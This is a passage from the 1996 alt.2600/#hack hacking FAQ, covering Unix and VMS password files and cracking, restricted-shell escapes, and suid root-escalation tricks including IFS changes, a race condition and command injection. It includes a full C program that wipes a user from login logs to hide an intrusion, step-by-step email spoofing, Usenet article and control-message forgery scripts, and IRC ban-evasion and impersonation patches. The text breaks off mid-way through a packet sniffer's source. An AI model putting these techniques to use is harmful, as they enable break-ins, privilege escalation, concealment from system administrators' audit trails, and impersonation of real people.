Archive-Name: alt-2600/faq
Posting-Frequency: Random
Last-Modified: 1996/01/07
Version: Beta .013


       Welcome to Beta .013 of the alt.2600/#hack FAQ!

       The purpose of this FAQ is to give you a general introduction
       to the topics covered in alt.2600 and #hack.  No document will
       make you a hacker.

       If you have a question regarding any of the topics covered in
       the FAQ, please direct it to alt.2600.  Please do not e-mail me
       with them, I do not have time to respond to each request
       personally.

       If your copy of the alt.2600/#hack FAQ does not end with the
       letters EOT on a line by themselves, you do not have the entire
       FAQ.

       If you do not have the entire FAQ, retrieve it from one of
       these sites:

       Get it on FTP at:
       rahul.net         /pub/lps/sysadmin/
       rtfm.mit.edu      /pub/usenet-by-group/alt.2600/
       clark.net         /pub/jcase/
       mirrors.aol.com   /pub/rtfm/usenet-by-group/alt.2600/
       ftp.winternet.com /users/nitehwk/phreak/

       Get it on the World Wide Web at:
       www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

       Get it on my BBS:
       Hacker's Haven (303)343-4053





                                The

                       alt.2600/#Hack F.A.Q.

                         Beta Revision .013

                  A TNO Communications Production

                                by
                              Voyager
                        [email protected]

                             Sysop of
                          Hacker's Haven
                          (303)343-4053


                         Greets go out to:

       A-Flat, Al, Aleph1, Bluesman, Cavalier, Cruiser, Cybin, C-Curve,
       DeadKat, Disorder, Edison, Frosty, Glen Roberts, Hobbit,
       Holistic Hacker, KCrow, Major, Marauder, Novocain, Outsider,
       Per1com, Presence, Rogue Agent, Route, sbin, Taran King, Theora,
       ThePublic, Tomes, and TheSaint.



          We work in the dark
          We do what we can
          We give what we have
          Our doubt is our passion, and our passion is our task
          The rest is the madness of art.

                    -- Henry James


          When I picture a perfect reader, I always picture a
          monster of courage and curiosity, also something
          supple, cunning, cautious, a born adventurer and
          discoverer...

                    -- Friedreich Nietzsche





Section A: Computers

 01. How do I access the password file under Unix?
 02. How do I crack Unix passwords?
 03. What is password shadowing?
 04. Where can I find the password file if it's shadowed?
 05. What is NIS/yp?
 06. What are those weird characters after the comma in my passwd file?
 07. How do I access the password file under VMS?
 08. How do I crack VMS passwords?
 09. What can be logged on a VMS system?
 10. What privileges are available on a VMS system?
 11. How do I break out of a restricted shell?
 12. How do I gain root from a suid script or program?
 13. How do I erase my presence from the system logs?
U 14. How do I send fakemail?
 15. How do I fake posts and control messages to UseNet?
 16. How do I hack ChanOp on IRC?
U 17. How do I modify the IRC client to hide my real username?
 18. How to I change to directories with strange characters in them?
U 19. What is ethernet sniffing?
 20. What is an Internet Outdial?
 21. What are some Internet Outdials?
U 22. What is this system?
U 23. What are the default accounts for XXX ?
 24. What port is XXX on?
 25. What is a trojan/worm/virus/logic bomb?
 26. How can I protect myself from viruses and such?
 27. Where can I get more information about viruses?
 28. What is Cryptoxxxxxxx?
 29. What is PGP?
 30. What is Tempest?
 31. What is an anonymous remailer?
U 32. What are the addresses of some anonymous remailers?
 33. How do I defeat copy protection?
 34. What is 127.0.0.1?
 35. How do I post to a moderated newsgroup?
U 36. How do I post to Usenet via e-mail?
 37. How do I defeat a BIOS password?
N 38. What is the password for <encrypted file>?
N 39. Is there any hope of a decompiler that would convert an executable
     program into C/C++ code?
N 40. How does the MS-Windows password encryption work?

Section B: Telephony

U 01. What is a Red Box?
 02. How do I build a Red Box?
 03. Where can I get a 6.5536Mhz crystal?
 04. Which payphones will a Red Box work on?
 05. How do I make local calls with a Red Box?
 06. What is a Blue Box?
 07. Do Blue Boxes still work?
 08. What is a Black Box?
 09. What do all the colored boxes do?
 10. What is an ANAC number?
U 11. What is the ANAC number for my area?
 12. What is a ringback number?
U 13. What is the ringback number for my area?
 14. What is a loop?
U 15. What is a loop in my area?
U 16. What is a CNA number?
 17. What is the telephone company CNA number for my area?
U 18. What are some numbers that always ring busy?
U 19. What are some numbers that temporarily disconnect phone service?
U 20. What is a Proctor Test Set?
U 21. What is a Proctor Test Set in my area?
 22. What is scanning?
 23. Is scanning illegal?
U 24. Where can I purchase a lineman's handset?
 25. What are the DTMF frequencies?
 26. What are the frequencies of the telephone tones?
U 27. What are all of the * (LASS) codes?
 28. What frequencies do cordless phones operate on?
 29. What is Caller-ID?
 30. How do I block Caller-ID?
 31. What is a PBX?
 32. What is a VMB?
 33. What are the ABCD tones for?
N 34. What are the International Direct Numbers?

Section C: Cellular

N 01. What is an MTSO?
N 02. What is a NAM?
N 03. What is an ESN?
N 04. What is an MIN?
N 05. What is a SCN?
N 06. What is a SIDH?
N 07. What are the forward/reverse channels?

Section D: Resources

 01. What are some ftp sites of interest to hackers?
 02. What are some fsp sites of interest to hackers?
U 03. What are some newsgroups of interest to hackers?
U 04. What are some telnet sites of interest to hackers?
U 05. What are some gopher sites of interest to hackers?
U 06. What are some World wide Web (WWW) sites of interest to hackers?
 07. What are some IRC channels of interest to hackers?
U 08. What are some BBS's of interest to hackers?
U 09. What are some books of interest to hackers?
U 10. What are some videos of interest to hackers?
U 11. What are some mailing lists of interest to hackers?
U 12. What are some print magazines of interest to hackers?
U 13. What are some e-zines of interest to hackers?
U 14. What are some organizations of interest to hackers?
U 15. What are some radio programs of interest to hackers?
N 16. What are other FAQ's of interest to hackers?
 17. Where can I purchase a magnetic stripe encoder/decoder?
 18. What are the rainbow books and how can I get them?


Section E: 2600

 01. What is alt.2600?
 02. What does "2600" mean?
 03. Are there on-line versions of 2600 available?
 04. I can't find 2600 at any bookstores.  What can I do?
 05. Why does 2600 cost more to subscribe to than to buy at a newsstand?


Section F: Miscellaneous

 01. What does XXX stand for?
 02. How do I determine if I have a valid credit card number?
U 03. What is the layout of data on magnetic stripe cards?
 04. What are the ethics of hacking?
 05. Where can I get a copy of the alt.2600/#hack FAQ?



U == Updated since last release of the alt.2600/#hack FAQ
N == New since last release of the alt.2600/#hack FAQ




Section A: Computers
~~~~~~~~~~~~~~~~~~~~

01. How do I access the password file under Unix?

In standard Unix the password file is /etc/passwd.  On a Unix system
with either NIS/yp or password shadowing, much of the password data may
be elsewhere.  An entry in the password file consists of seven colon
delimited fields:

Username
Encrypted password (And optional password aging data)
User number
Group Number
GECOS Information
Home directory
Shell

]
] Sample entry from /etc/passwd:
]
] will:5fg63fhD3d5gh:9406:12:Will Spencer:/home/fsg/will:/bin/bash
]

Broken down, this passwd file line shows:

         Username: will
Encrypted password: 5fg63fhD3d5gh
      User number: 9406
     Group Number: 12
GECOS Information: Will Spencer
   Home directory: /home/fsg/will
            Shell: /bin/bash


02. How do I crack Unix passwords?

Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
passwords are encrypted with a one way function.  The login program
encrypts the text you enter at the "password:" prompt and compares
that encrypted string against the encrypted form of your password.

Password cracking software uses wordlists.  Each word in the wordlist
is encrypted and the results are compared to the encrypted form of the
target password.

The best cracking program for Unix passwords is currently Crack by
Alec Muffett.  For PC-DOS, the best package to use is currently
CrackerJack.  CrackerJack is available via ftp from clark.net
/pub/jcase/.


03. What is password shadowing?

Password shadowing is a security system where the encrypted password
field of /etc/passwd is replaced with a special token and the
encrypted password is stored in a separate file which is not readable
by normal system users.

To defeat password shadowing on many (but not all) systems, write a
program that uses successive calls to getpwent() to obtain the
password file.

Example:

#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}


04. Where can I find the password file if it's shadowed?

Unix                  Path                            Token
-----------------------------------------------------------------
AIX 3                 /etc/security/passwd            !
      or             /tcb/auth/files/<first letter   #
                           of username>/<username>
A/UX 3.0s             /tcb/files/auth/?/*
BSD4.3-Reno           /etc/master.passwd              *
ConvexOS 10           /etc/shadpw                     *
ConvexOS 11           /etc/shadow                     *
DG/UX                 /etc/tcb/aa/user/               *
EP/IX                 /etc/shadow                     x
HP-UX                 /.secure/etc/passwd             *
IRIX 5                /etc/shadow                     x
Linux 1.1             /etc/shadow                     *
OSF/1                 /etc/passwd[.dir|.pag]          *
SCO Unix #.2.x        /tcb/auth/files/<first letter   *
                           of username>/<username>
SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
SunOS 5.0             /etc/shadow
                     <optional NIS+ private secure maps/tables/whatever>
System V Release 4.0  /etc/shadow                     x
System V Release 4.2  /etc/security/* database
Ultrix 4              /etc/auth[.dir|.pag]            *
UNICOS                /etc/udb                        *


05. What is NIS/yp?

NIS (Network Information System) in the current name for what was once
known as yp (Yellow Pages).  The purpose for NIS is to allow many
machines on a network to share configuration information, including
password data.  NIS is not designed to promote system security.  If
your system uses NIS you will have a very short /etc/passwd file that
includes a line that looks like this:

+::0:0:::

To view the real password file use this command "ypcat passwd"


06. What are those weird characters after the comma in my passwd file?

The characters are password aging data.  Password aging forces the
user to change passwords after a System Administrator specified period
of time.  Password aging can also force a user to keep a password for
a certain number of weeks before changing it.

]
] Sample entry from /etc/passwd with password aging installed:
]
] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash
]

Note the comma in the encrypted password field.  The characters after
the comma are used by the password aging mechanism.

]
] Password aging characters from above example:
]
] M.z8
]

The four characters are interpreted as follows:

 1: Maximum number of weeks a password can be used without changing.
 2: Minimum number of weeks a password must be used before changing.
3&4: Last time password was changed, in number of weeks since 1970.

Three special cases should be noted:

If the first and second characters are set to '..' the user will be
forced to change his/her passwd the next time he/she logs in.  The
passwd program will then remove the passwd aging characters, and the
user will not be subjected to password aging requirements again.

If the third and fourth characters are set to '..' the user will be
forced to change his/her passwd the next time he/she logs in. Password
aging will then occur as defined by the first and second characters.

If the first character (MAX) is less than the second character (MIN),
the user is not allowed to change his/her password.  Only root can
change that users password.

It should also be noted that the su command does not check the password
aging data.  An account with an expired password can be su'd to
without being forced to change the password.


                       Password Aging Codes
+------------------------------------------------------------------------+
|                                                                        |
| Character:  .  /  0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  G  H |
|    Number:  0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 |
|                                                                        |
| Character:  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  a  b |
|    Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
|                                                                        |
| Character:  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v |
|    Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
|                                                                        |
| Character:  w  x  y  z                                                 |
|    Number: 60 61 62 63                                                 |
|                                                                        |
+------------------------------------------------------------------------+


07. How do I access the password file under VMS?

Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
unlike Unix, most users do not have access to read the password file.


08. How do I crack VMS passwords?

Write a program that uses the SYS$GETUAF functions to compare the
results of encrypted words against the encrypted data in SYSUAF.DAT.

Two such programs are known to exist, CHECK_PASSWORD and
GUESS_PASSWORD.


09. What can be logged on a VMS system?

Virtually every aspect of the VMS system can be logged for
investigation.  To determine the status of the accounting on your system
use the command SHOW ACCOUNTING.  System accounting is a facility for
recording information about the use of the machine from a system
accounting perspective (resource logging such as CPU time, printer usage
etc.), while system auditing is done with the aim of logging information
for the purpose of security.  To enable accounting:

$ SET ACCOUNTING  [/ENABLE=(Activity...)]

This enables accounting logging information to the accounting log
file SYS$MANAGER:ACCOUNTING.DAT.  This also is used to close
the current log file and open a new one with a higher version
number.

The following activities can be logged:

       BATCH                   Termination of a batch job
       DETACHED                Termination of a detached job
       IMAGE                   Image execution
       INTERACTIVE             Interactive job termination
       LOGIN_FAILURE           Login failures
       MESSAGE                 Users messages
       NETWORK                 Network job termination
       PRINT                   Print Jobs
       PROCESS                 Any terminated process
       SUBPROCESS              Termination of  a subprocess

To enable security auditing use:

       $ SET AUDIT [/ENABLE=(Activity...)]

The /ALARM qualifier is used to raise an alarm to all terminals approved
as security operators, which means that you need the SECURITY
privileges.  You can determine your security auditing configuration
using $ SHOW AUDIT /ALL

The security auditor can be configured to log the following
activities:

       ACL                     Access Control List requested events
       AUTHORIZATION           Modification to the system user
                               authorization file  SYS$SYSTEM:SYSUAF.DAT
       BREAKIN                 Attempted Break-ins
       FILE_ACCESS             File or global section access
       INSTALL                 Occurrence of any INSTALL operations
       LOGFAILURE              Any login failures
       LOGIN                   A login attempt from various sources
       LOGOUT                  Logouts
       MOUNT                   Mount or dismount requests


10. What privileges are available on a VMS system?

ACNT            Allows you to restrain accounting messages
ALLSPOOL        Allows you to allocate spooled devices
ALTPRI          Allot Priority.  This allows you to set any priority
               value
BUGCHK          Allows you make bug check error log entries
BYPASS          Enables you to disregard protections
CMEXEC/
CMKRNL          Change to executive or kernel mode.  These privileges
               allow a process to execute optional routines with KERNEL
               and EXECUTIVE access modes. CMKRNL is the most powerful
               privilege on VMS as anything protected can be accessed
               if you have this privilege.  You must have these
               privileges to gain access to the kernel data structures
               directly.
DETACH          This privilege allow you to create detached processes of
               arbitrary UICs
DIAGNOSE        With this privilege you can diagnose devices
EXQUOTA         Allows you to exceed your disk quota
GROUP           This privilege grants you permission to  affect other
               processes in the same rank
GRPNAM          Allows you to insert group logical names into the group
               logical names table.
GRPPRV          Enables you to access system group objects through
               system protection field
LOG_IO          Allows you to issue logical input output requests
MOUNT           May execute the mount function
NETMBX          Allows you to create network connections
OPER            Allows you to perform operator functions
PFNMAP          Allows you to map to specific physical pages
PHY_IO          Allows you to perform physical input output requests
PRMCEB          Can create permanent common event clusters
PRMGBL          Allows you to create permanent global sections
PRMMBX          Allows you to create permanent mailboxes
PSWAPM          Allows you to change a processes swap mode
READALL         Allows you read access to everything
SECURITY        Enables you to perform security  related functions
SETPRV          Enable all privileges
SHARE           Allows you to access devices allocated to other users.
               This is used to assign system mailboxes.
SHMEM           Enables you to modify objects in shared memory
SYSGBL          Allows you to create system wide permanent global
               sections
SYSLCK          Allows you to lock system wide resources
SYSNAM          Allows you to insert in system logical names in the
               names table.
SYSPRV          If a process holds this privilege then it is the same as
               a process holding the system user identification code.
TMPMBX          Allows you create temporary mailboxes
VOLPRO          Enables you to override volume protection
WORLD           When this is set you can affect other processes in the
               world

To determine what privileges your process is running with issue the command:

$ show proc/priv


11. How do I break out of a restricted shell?

On poorly implemented restricted shells you can break out of the
restricted environment by running a program that features a shell
function.  A good example is vi.  Run vi and use this command:

:set shell=/bin/sh

then shell using this command:

:shell

If your restricted shell prevents you from using the "cd" command, ftp
into your account and you may be able to cd.


12. How do I gain root from a suid script or program?

1. Change IFS.

If the program calls any other programs using the system() function
call, you may be able to fool it by changing IFS.  IFS is the Internal
Field Separator that the shell uses to delimit arguments.

If the program contains a line that looks like this:

system("/bin/date")

and you change IFS to '/' the shell will them interpret the
proceeding line as:

bin date

Now, if you have a program of your own in the path called "bin" the
suid program will run your program instead of /bin/date.

To change IFS, use this command:

IFS='/';export IFS      # Bourne Shell
setenv IFS '/'          # C Shell
export IFS='/'          # Korn Shell


2. link the script to -i

Create a symbolic link named "-i" to the program.  Running "-i"
will cause the interpreter shell (/bin/sh) to start up in interactive
mode.  This only works on suid shell scripts.

Example:

% ln suid.sh -i
% -i
#


3. Exploit a race condition

Replace a symbolic link to the program with another program while the
kernel is loading /bin/sh.

Example:

nice -19 suidprog ; ln -s evilprog suidroot


4. Send bad input to the program.

Invoke the name of the program and a separate command on the same
command line.

Example:

suidprog ; id


13. How do I erase my presence from the system logs?

Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
files that can be edited by hand with vi, you must use a program
specifically written for this purpose.

Example:

#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
   struct utmp utmp_ent;

 if ((f=open(UTMP_NAME,O_RDWR))>=0) {
    while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
      if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                write (f, &utmp_ent, sizeof (utmp_ent));
           }
    close(f);
 }
}

void kill_wtmp(who)
char *who;
{
   struct utmp utmp_ent;
   long pos;

   pos = 1L;
   if ((f=open(WTMP_NAME,O_RDWR))>=0) {

    while(pos != -1L) {
       lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
       if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
         pos = -1L;
       } else {
         if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
              bzero((char *)&utmp_ent,sizeof(struct utmp ));
              lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
              write (f, &utmp_ent, sizeof (utmp_ent));
              pos = -1L;
         } else pos += 1L;
       }
    }
    close(f);
 }
}

void kill_lastlog(who)
char *who;
{
   struct passwd *pwd;
   struct lastlog newll;

    if ((pwd=getpwnam(who))!=NULL) {

       if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
           lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
           bzero((char *)&newll,sizeof( newll ));
           write(f, (char *)&newll, sizeof( newll ));
           close(f);
       }

   } else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
   if (argc==2) {
       kill_lastlog(argv[1]);
       kill_wtmp(argv[1]);
       kill_utmp(argv[1]);
       printf("Zap2!\n");
   } else
   printf("Error.\n");
}


14. How do I send fakemail?

Telnet to port 25 of the machine you want the mail to appear to
originate from.  Enter your message as in this example:

HELO bellcore.com
MAIL FROM:[email protected]
RCPT TO:[email protected]
DATA
From: [email protected] (The Voyager)
To: [email protected]
Subject: Clipper
Reply-To: [email protected]

       Please discontinue your silly Clipper initiative.
.
QUIT

On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
line will not work.  Test by sending yourself fakemail first.

For more information read RFC 822 "Standard for the format of ARPA
Internet text messages."


15. How do I fake posts and control messages to UseNet?

From: Anonymous (Pretending to be: [email protected] (David C Lawrence))
Subject: FAQ: Better living through forgery
Date: 19 Mar 1995 02:37:09 GMT

       Anonymous netnews without "anonymous" remailers

Inspired by the recent "NetNews Judges-L" events, this file has been
updated to cover forging control messages, so you can do your own
article canceling and create and destroy your own newsgroups.

Save any news article to a file.  We'll call it "hak" in this example.

Edit "hak", and remove any header lines of the form

        From some!random!path!user   (note: "From ", not "From: " !!)
        Article:
        Lines:
        Xref:

Shorten the Path: header down to its LAST two or three "bangized"
components. This is to make the article look like it was posted from
where it really was posted, and originally hit the net at or near the
host you send it to.  Or you can construct a completely new Path: line
to reflect your assumed alias.

Make some change to the Message-ID: field, that isn't likely to be
duplicated anywhere.  This is usually best done by adding a couple of
random characters to the part before the @, since news posting programs
generally use a fixed-length field to generate these IDs.

Change the other headers to say what you like -- From:, Newsgroups:,
Sender:, etc.  Replace the original message text with your message.  If
you are posting to a moderated group or posting a control message,
remember to put in an Approved: header to bypass the moderation
mechanism.

To specifically cancel someone else's article, you need its message-ID.
Your message headers, in addition to what's already there, should also
contain the following with that message-ID in it.  This makes it a
"control message". NOTE: control messages generally require an
Approved: header as well, so you should add one.

Subject: cmsg cancel <[email protected]>
Control: cancel <[email protected]>
Approved: [email protected]

Newsgroups are created and destroyed with control messages, too.  If
you wanted to create, for instance, comp.misc.microsoft.sucks, your
control headers would look like

Subject: cmsg newgroup comp.misc.microsoft.sucks
Control: newgroup comp.misc.microsoft.sucks

Add on the string "moderated" at the end of these if you want the group
to be "moderated with no moderator" as with alt.hackers.  Somewhere in
the body of your message, you should include the following text,
changed with the description of the group you're creating:

For your newsgroups file:
comp.misc.microsoft.sucks               We don't do windows

To remove a group, substitute "rmgroup" for "newgroup" in the header
lines above.  Keep in mind that most sites run all "rmgroup" requests
through a human news-master, who may or may not decide to honor it.
Group creation is more likely to be automatic than deletion at most
installations.  Any newsgroup changes are more likely to take effect if
the come from me, since my name is hardwired into many of the NNTP
control scripts, so using the From: and Approved: headers from this
posting is recommended.

Save your changed article, check it to make sure it contains NO
reference to yourself or your own site, and send it to your favorite
NNTP server that permits transfers via the IHAVE command, using the
following script:

=======================
#! /bin/sh
## Post an article via IHAVE.
## args: filename server

 if test "$2" = "" ; then
  echo usage: $0 filename server
  exit 1
fi
if test ! -f $1 ; then
  echo $1: not found
  exit 1
fi

# suck msg-id out of headers, keep the brackets
msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
  sed 's/.*-[Ii][Dd]: //'`
echo $msgid

( sleep 5
  echo IHAVE $msgid
  sleep 5
  cat $1
  sleep 1
   echo "."
  sleep 1
  echo QUIT ) | telnet $2 119
=======================

If your article doesn't appear in a day or two, try a different server.
They are easy to find.  Here's a script that will break a large file
full of saved netnews into a list of hosts to try.  Edit the output of
this if you want, to remove obvious peoples' names and other trash.

=======================
#! /bin/sh
FGV='fgrep -i -v'
egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
=======================

Once you have your host list, feed it to the following script.

 =======================
#! /bin/sh

while read xx ; do
if test "$xx" = "" ; then continue;
fi
echo === $xx
( echo open $xx 119
  sleep 5
  echo ihave [email protected]
  sleep 4
  echo .
  echo quit
  sleep 1
  echo quit
) | telnet
done
=======================

If the above script is called "findem" and you're using csh, you should do

        findem < list >& outfile

so that ALL output from telnet is captured.  This takes a long time,
but when it finishes, edit "outfile" and look for occurrences of "335".
These mark answers from servers that might be willing to accept an
article.  This isn't a completely reliable indication, since some
servers respond with acceptance and later drop articles.  Try a given
server with a slightly modified repeat of someone else's message, and
see if it eventually appears.

Sometimes the telnets get into an odd state, and freeze, particularly
when a host is refusing NNTP connections.  If you manually kill these
hung telnet processes but not the main script, the script will continue
on.  In other words, you may have to monitor the finding script a
little while it is running.

You will notice other servers that don't necessarily take an IHAVE, but
say "posting ok".  You can probably do regular POSTS through these, but
they will add an "NNTP-Posting-Host: " header containing the machine
YOU came from and are therefore unsuitable for completely anonymous
use.

PLEASE USE THE INFORMATION IN THIS ARTICLE FOR CONSTRUCTIVE PURPOSES ONLY.


16. How do I hack ChanOp on IRC?

Find a server that is split from the rest of IRC and create your own
channel there using the name of the channel you want ChanOp on.  When
that server reconnects to the net, you will have ChanOp on the real
channel.  If you have ServerOp on a server, you can cause it to split
on purpose.


17. How do I modify the IRC client to hide my real username?

Note: This FAQ answer was written by someone else, but I do not know who.
     If you know who originally wrote this, please e-mail me.

-- BEGIN QUOTED TEXT --

Applying these changes to the source code for your ircII client and
recompiling gives you a new ircII command: /NEWUSER.  This new command
can be used as follows:

*   /NEWUSER <new_username> [new_IRCNAME]
*       <new_username> is a new username to use and is required
*       [new_IRCNAME] is a new IRCNAME string to use and is optional
*   This will disconnect you from your server and reconnect using
*     the new information given.  You will rejoin all channel you
*     are currently on and keep your current nickname.

The effect is basically changing your username/IRCname on the fly.
Although you are disconnected from your server and reconnected, the
ircII client is never exited, thus keeping all your state information
and aliases intact.  This is ideal for bots that wish to be REALLY
obnoxious in ban evasion. ;)

As this is now a new command in ircII, it can be used in scripts. Be
aware that the reconnect associated with the NEWUSER command takes time,
so TIMER any commands that must immediately follow the NEWUSER. For
example... ban evasion made easy (but beware infinite reconnects when
your site is banned):

on ^474 * {
 echo *** Banned from channel $1
 if ($N == [AnnMurray]) {
   nick $randomstring
   join $1
   } {
   nick AnnMurray
   newuser $randomstring
   timer 5 join $1
   }
 }

Or just to be annoying... a /BE <nickname> alias that will assume a
person's username and IRCNAME:

alias be {
 ^on ^311 * {
   ^on 311 -*
   newuser $2 $5-
   }
 whois $0
 }

Now... in order to add this command to your ircII client, get the latest
client source (or whatever client source you are using).  Cd into the
source directory and edit the file "edit.c".  Make the following
changes:

Locate the line which reads:
extern  void    server();

Insert the following line after it:
static  void    newuser();

This pre-defines a new function "newuser()" that we'll add later.


Now, locate the line which reads:
       "NAMES",        "NAMES",        funny_stuff,            0,

Insert the following line after it:
       "NEWUSER",      NULL,           newuser,                0,

This adds a new command NEWUSER to the list of valid IRCII commands, and
tells it to call our new function newuser() to perform it.


Finally, go the bottom of the file and add the following code as our new
function "newuser()":

/*
* newuser: the /NEWUSER command.  Added by Hendrix
*   Parameters as follows:
*     /NEWUSER <new_username> [new_IRCNAME]
*       <new_username> is a new username to use and is required
*       [new_IRCNAME] is a new IRCNAME string to use and is optional
*   This will disconnect you from your server and reconnect using
*     the new information given.  You will rejoin all channels you
*     are currently on and keep your current nickname.
*/

static void    newuser(command, args)
char    *command,
       *args;
{
       char    *newuname;

       if (newuname = next_arg(args, &args))
       {
               strmcpy(username, newuname, NAME_LEN);
               if (*args)
                       strmcpy(realname, args, REALNAME_LEN);
               say("Reconnecting to server...");
               close_server(from_server);
               if (connect_to_server(server_list[from_server].name,
                     server_list[from_server].port, primary_server) != -1)
               {
                       change_server_channels(primary_server, from_server);
                       set_window_server(-1, from_server, 1);
               }
               else
                       say("Unable to reconnect. Use /SERVER to connect.");
       }
       else
               say("You must specify a username and, optionally, an IRCNAME");
}

-- END QUOTED TEXT --

/NEWUSER will not hide you from a CTCP query.  To do that, modify ctcp.c
as shown in the following diff and set an environment variable named
CTCPFINGER with the information you would like to display when queried.

*** ctcp.old
--- ctcp.c
***************
*** 334 ****
!       char    c;
--- 334 ---
!       char    c, *fing;
***************
*** 350,354 ****
!               if (pwd = getpwuid(uid))
               {
                       char    *tmp;
--- 350,356 ----
!               if (fing = getenv("CTCPFINGER"))
!                       send_ctcp_reply(from, ctcp->name, fing, diff, c);
!               else if (pwd = getpwuid(uid))
               {
                       char    *tmp;


18. How to I change to directories with strange characters in them?

These directories are often used by people trying to hide information,
most often warez (commercial software).

There are several things you can do to determine what these strange
characters are.  One is to use the arguments to the ls command that
cause ls to give you more information:

From the man page for ls:

   -F   Causes directories to be marked with a trailing ``/'',
        executable files to be marked with a trailing ``*'', and
        symbolic links to be marked with a trailing ``@'' symbol.

   -q   Forces printing of non-graphic characters in filenames as the
        character ``?''.

   -b   Forces printing of non-graphic characters in the \ddd
        notation, in octal.

Perhaps the most useful tool is to simply do an "ls -al filename" to
save the directory of the remote ftp site as a file on your local
machine.  Then you can do a "cat -t -v -e filename" to see exactly
what those bizarre little characters are.

From the man page for cat:

   -v  Causes non-printing characters (with the exception of tabs,
       newlines, and form feeds) to be displayed.  Control characters
       are displayed as ^X (<Ctrl>x), where X is the key pressed with
       the <Ctrl> key (for example, <Ctrl>m is displayed as ^M).  The
       <Del> character (octal 0177) is printed as ^?.  Non-ASCII
       characters (with the high bit set) are printed as M -x, where
       x is the character specified by the seven low order bits.

   -t  Causes tabs to be printed as ^I and form feeds as ^L.  This
       option is ignored if the -v option is not specified.

   -e  Causes a ``$'' character to be printed at the end of each line
       (prior to the new-line).  This option is ignored if the -v
       option is not set.

If the directory name includes a <SPACE> or a <TAB> you will need to
enclose the entire directory name in quotes.  Example:

cd "..<TAB>"

On an IBM-PC, you may enter these special characters by holding down
the <ALT> key and entering the decimal value of the special character
on your numeric keypad.  When you release the <ALT> key, the special
character should appear on your screen.  An ASCII chart can be very
helpful.

Sometimes people will create directories with some of the standard
stty control characters in them, such as ^Z (suspend) or ^C (intr).
To get into those directories, you will first need to user stty to
change the control character in question to another character.

From the man page for stty:

   Control assignments

   control-character C
                     Sets control-character to C, where control-character is
                     erase, kill, intr (interrupt), quit, eof, eol, swtch
                     (switch), start, stop or susp.

                     start and stop are available as possible control char-
                     acters for the control-character C assignment.

                     If C is preceded by a caret (^) (escaped from the
                     shell), then the value used is the corresponding con-
                     trol character (for example, ^D is a <Ctrl>d; ^? is
                     interpreted as DELETE and ^- is interpreted as unde-
                     fined).

Use the stty -a command to see your current stty settings, and to
determine which one is causing you problems.


19. What is ethernet sniffing?

Ethernet sniffing is listening (with software) to the raw ethernet
device for packets that interest you.  When your software sees a
packet that fits certain criteria, it logs it to a file.  The most
common criteria for an interesting packet is one that contains words
like "login" or "password."

Many ethernet sniffers are available, here are a few that may be on
your system now:

OS              Sniffer
~~              ~~~~~~~
4.3/4.4 BSD     tcpdump            /* Available via anonymous ftp           */
FreeBSD         tcpdump            /* Available via anonymous ftp at        */
                                  /* gatekeeper.dec.com
                   /* /.0/BSD/FreeBSD/FreeBSD-current/src/contrib/tcpdump/ */
NetBSD          tcpdump            /* Available via anonymous ftp at        */
                                  /* gatekeeper.dec.com
                            /* /.0/BSD/NetBSD/NetBSD-current/src/usr.sbin/ */
DEC Unix        tcpdump            /* Available via anonymous ftp           */
DEC Ultrix      tcpdump            /* Available via anonymous ftp           */
HP/UX           nettl  (monitor)
             & netfmt (display)
               nfswatch           /* Available via anonymous ftp           */
Linux           tcpdump            /* Available via anonymous ftp at        */
                                  /* sunsite.unc.edu                       */
                                  /* /pub/Linux/system/Network/management/ */
SGI Irix        nfswatch           /* Available via anonymous ftp           */
               Etherman
               tcpdump            /* Available via anonymous ftp           */
Solaris         snoop
               tcpdump
SunOS           etherfind
               nfswatch           /* Available via anonymous ftp           */
               tcpdump            /* Available via anonymous ftp           */
DOS             ETHLOAD            /* Available via anonymous ftp as        */
                                  /* ethld104.zip                          */
               The Gobbler        /* Available via anonymous ftp           */
               LanPatrol
               LanWatch
               Netmon
               Netwatch
               Netzhack           /* Available via anonymous ftp at        */
                                  /* mistress.informatik.unibw-muenchen.de */
                                  /* /pub/netzhack.mac                     */
Macintosh       Etherpeek

Here is source code for a sample ethernet sniffer:

/* Esniff.c */

#include <stdio.h>
#include <ctype.h>
#include <string.h>

#include <sys/time.h>
#include <sys/file.h>
#include <sys/stropts.h>
#include <sys/signal.h>
#include <sys/types.h>
